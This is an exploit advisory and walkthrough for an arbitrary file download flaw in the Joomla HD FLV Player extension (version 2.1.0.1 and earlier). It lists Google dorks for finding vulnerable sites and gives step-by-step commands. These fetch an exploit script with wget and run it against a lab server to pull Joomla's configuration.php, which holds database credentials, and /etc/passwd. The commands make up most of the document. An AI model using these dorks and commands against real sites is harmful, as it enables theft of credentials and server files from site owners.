######################

# Exploit Title :  Joomla HD FLV Player <= 2.1.0.1 Arbitrary File Download Vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://www.hdflvplayer.net/

# Software Link : http://www.hdflvplayer.net/hd-flv-player-download.php

# Dork google 1:  inurl:/component/hdflvplayer/
# Dork google 2:  inurl:com_hdflvplayer    

# Date : 2014-11-11

# Tested on : BackBox 3.x/4.x

####################################################################
#
# This video is intended for educational 
# purposes only and the author can not be held liable for 
# any kind of damages done whatsoever to your machine, 
# or damages caused by some other,creative application of this video.
# In any case you disagree with the above statement,stop here.
#
#####################################################################


Server Web+Basedir: http://10.0.0.67/joomla


1) Download Extension v.2.1.0.1 :

http://www.hdflvplayer.net/


2) Connect to Joomla and install the extension

http://10.0.0.67/joomla/administrator/


3) Check the installation:

http://10.0.0.67/joomla/index.php?option=com_hdflvplayer


4) Download Exploit: 

wget http://www.homelab.it/wp-content/uploads/2014/11/j00m_hd_flv_afd.py_.txt


5) Run Exploit and download joomla's configuration file:

python j00m_hd_flv_afd.py -t http://10.0.0.67/joomla -f configuration.php


5) Run Exploit and read linux passwd file:

python j00m_hd_flv_afd.py -t http://10.0.0.67/joomla -f /etc/passwd


# Exploit written by:

#                    Claudio Viviani

#                    http://www.homelab.it
#                    info@homelab.it

#                    https://www.facebook.com/homelabit
#                    https://twitter.com/homelabit
#                    https://plus.google.com/+HomelabIt1/
#                    https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww